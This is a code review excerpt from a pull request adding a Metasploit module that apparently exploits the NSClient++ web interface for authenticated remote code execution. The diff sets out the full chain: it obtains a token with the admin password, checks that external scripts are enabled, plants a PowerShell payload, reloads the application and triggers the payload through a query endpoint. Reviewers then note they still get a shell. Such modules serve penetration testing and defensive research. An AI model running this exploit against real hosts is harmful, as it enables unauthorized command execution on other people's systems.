modules/exploits/windows/http/nscp_authenticated_rce.rb

```diff
@@ -0,0 +1,228 @@
+    })
+
+    print_status('Waiting for Application to reload . . .')
+    sleep(10)
+    response = false
+    count = 0
+    until response
+      begin
+        r = send_request_cgi({
+          'method' => 'GET',
+          'headers' => { 'TOKEN' => token },
+          'uri' => normalize_uri('/')
+        })
+        if !r.body.empty?
+          response = true
+        end
+      rescue StandardError
+        count += 1
+        if count > 10
+          print_status('Application failed to reload. Nice DoS exploit! /s')
+        end
+      end
+    end
+  end
+
+  def trigger_payload(token, key)
+    print_status('Triggering payload, should execute shortly . . .')
+
+    begin
+      send_request_cgi({
+        'method' => 'GET',
+        'headers' => { 'TOKEN' => token },
+        'uri' => normalize_uri('/query/' + key)
+      })
+    rescue StandardError
+      print_status('Timeout exceeded. Assuming your payload executed . . .')
+    end
+  end
+
+  def external_scripts_feature_enabled?(token)
+    endpoint = '/registry/control/module/load?name=CheckExternalScripts'
+
+    r = send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri(endpoint)
+    })
+
+    r.body.to_s.include? 'STATUS_OK'
+  end
+
+  def get_auth_token
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/auth/token?password=' + datastore['PASSWORD'])
+    })
+
+    if r.code == 200
+      begin
+        auth_token = r.body.to_s[/"auth token": "(\w*)"/, 1]
+        return auth_token
+      rescue StandardError
+        :no_token_found
+      end
+    else
+      :wrong_password
+    end
+  rescue StandardError
+    :failed_to_connect
+  end
+
+  def check
+    token = get_auth_token
+
+    if token == :failed_to_connect
+      print_error("Can't access to NSClient web interface, maybe the web interface is not activated or something is wrong with the targeted host")
+      CheckCode::Safe
+    elsif token == :wrong_password
+      print_error('Unable to connect to NSClient web interface because the admin password given is wrong')
+      CheckCode::Unknown
+    elsif token == :no_token_found
+      print_error('Unable to get an authentification token, maybe the target is safe')
+      CheckCode::Unknown
+    else
+      print_good('Got auth token: ' + token)
+      if external_scripts_feature_enabled?(token)
+        print_good('External scripts feature enabled !')
+        CheckCode::Vulnerable
+      else
+        print_good('External scripts feature disabled !')
+        CheckCode::Safe
+      end
+    end
+  end
+
+  def exploit
+    cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)
+    token = get_auth_token
+
+    if token != :failed_to_connect && token != :wrong_password && token != :no_token_found
+      rand_key = generate_random_name
+      configure_payload(token, cmd, rand_key)
+      reload_config(token)
+      token = get_auth_token
```

Comment:
```suggestion
```

Was able to remove this line and still get a shell, is it needed?

Reply:
Just in case the app reloading deletes the current auth token. I don't know if it happens often.

Reply:
Fair enough, we'll keep it in 👍  Could put a comment on that line saying why we're keeping it?